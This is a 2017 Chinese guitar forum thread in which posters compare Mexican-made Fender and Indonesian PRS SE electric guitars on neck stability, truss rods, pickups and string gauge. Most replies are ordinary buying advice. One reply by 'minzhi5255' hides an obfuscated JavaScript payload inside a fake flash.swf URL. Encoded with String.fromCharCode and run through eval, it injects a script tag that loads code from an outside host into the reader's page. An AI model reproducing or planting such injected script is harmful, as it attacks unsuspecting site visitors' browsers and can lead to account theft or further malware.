斯文混子 发表于 2017-3-17 10:13:55

墨标和印尼产的prs对比,哪个更好?

小弟在4000-5000之间选择电吉他,看上了墨标和印尼的prs,玩过朋友的prs,手感不错,但是感觉prs,琴头旋钮容易松,容易跑音,三拼的脖子感觉也挺容易变形的,不知道是不是个例问题。墨芬没玩过,脖子怎么样?说是加粗的钢筋,本人不玩太重的风格,想买个单单双的。现在犹豫不决不知道买哪个了,还请具体玩过这两个琴的,给点建议,或者有更好的推荐。
发自吉他中国iPhone客户端

斯文混子 发表于 2017-3-17 10:20:23

自顶一下有没有人

老夫惭愧啊 发表于 2017-3-17 10:42:28

我感觉要么就是芬,要么就是G,最差一把奶子,感觉其他牌子不伦不类

这个世界会好吗 发表于 2017-3-17 13:40:35

您就只知道这三个牌子吧!

Crockey 发表于 2017-3-17 13:49:03

老夫惭愧啊 发表于 2017-3-17 10:42
我感觉要么就是芬,要么就是G,最差一把奶子,感觉其他牌子不伦不类

汽车要么奔驰,要么宝马,最差奥迪,其他牌子不伦不类?

Crockey 发表于 2017-3-17 13:53:50

prs se和墨芬都用过,这个价位来说都不错,看你主要弹什么,失真居多或者喜欢双拾音器声音的选se,清音为主或喜欢单线圈声音的选墨芬。要是不知道喜欢什么就选外形喜欢的。

fanxuping 发表于 2017-3-17 13:57:04

3拼就是为了琴颈更加坚固 现在好多厂家都这么做 FENDER好像也是吧

GC电声客服 发表于 2017-3-17 13:59:59

很简单,对于22或24品经常会用到的哥们,还是选PRS SE吧。如果基本上不用那么高的把位,那么墨标是妥妥的。综合来说我个人会选墨标。它螺栓式颈身链接让音头很清晰,手感也舒服,010标准音高琴颈毫无压力。

81816281 发表于 2017-3-17 14:57:51

单单双墨粉啊

潮流大保健 发表于 2017-3-17 15:20:42

PRS SE不要问为什么你去琴行试一下 就知道了

斯文混子 发表于 2017-3-17 20:18:41

墨标的琴颈不是一体的吗?

weekershuo 发表于 2017-3-17 21:07:27

这俩不是一级别吧,墨标应该对韩产se啊,如果是印尼的,还是推荐墨标吧

小霖 发表于 2017-3-17 21:10:15

5000再加一点应该能收到一把二手的美芬了,芬达买一手总觉得亏大了

wood178 发表于 2017-3-17 21:48:34

去年的墨豪大降价了 5000多一点

minzhi5255 发表于 2017-3-17 22:47:52

rs se和墨芬都用过,这个价位来说都不错

http://localhost/flash.swf?'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+'

speedi113 发表于 2017-3-17 22:50:23

你考虑的都不是重点,小概率事件。推荐PRS

斯文混子 发表于 2017-3-18 09:14:41

GC电声客服 发表于 2017-3-17 13:59
很简单,对于22或24品经常会用到的哥们,还是选PRS SE吧。如果基本上不用那么高的把位,那么墨标是妥妥的。 ...

谢谢,我想问一下fender 墨标的琴颈是单向调节还是双向?

catse7en 发表于 2017-3-18 10:11:33

一会准有人出来说加钱上韩产PRS···

GC电声客服 发表于 2017-3-18 12:24:44

斯文混子 发表于 2017-3-18 09:14
谢谢,我想问一下fender 墨标的琴颈是单向调节还是双向?

现在市面上除了少数复古琴,基本上已经没有单向调节的钢筋了,墨标是双向的。

斯文混子 发表于 2017-3-18 18:09:54

GC电声客服 发表于 2017-3-18 12:24
现在市面上除了少数复古琴,基本上已经没有单向调节的钢筋了,墨标是双向的。 ...

谢谢!

x_wh 发表于 2017-3-20 09:11:46

你可以看看PRS SE 2017

chinatieling 发表于 2017-3-20 10:48:53

Crockey 发表于 2017-3-17 13:53
prs se和墨芬都用过,这个价位来说都不错,看你主要弹什么,失真居多或者喜欢双拾音器声音的选se,清音为主 ...

同意6楼的意见

176623756 发表于 2017-6-24 20:21:29

GC电声客服 发表于 2017-3-17 13:59
很简单,对于22或24品经常会用到的哥们,还是选PRS SE吧。如果基本上不用那么高的把位,那么墨标是妥妥的。 ...

请教海神,墨豪lone star也可以直接用010的弦吗
页: [1]
查看完整版本: 墨标和印尼产的prs对比,哪个更好?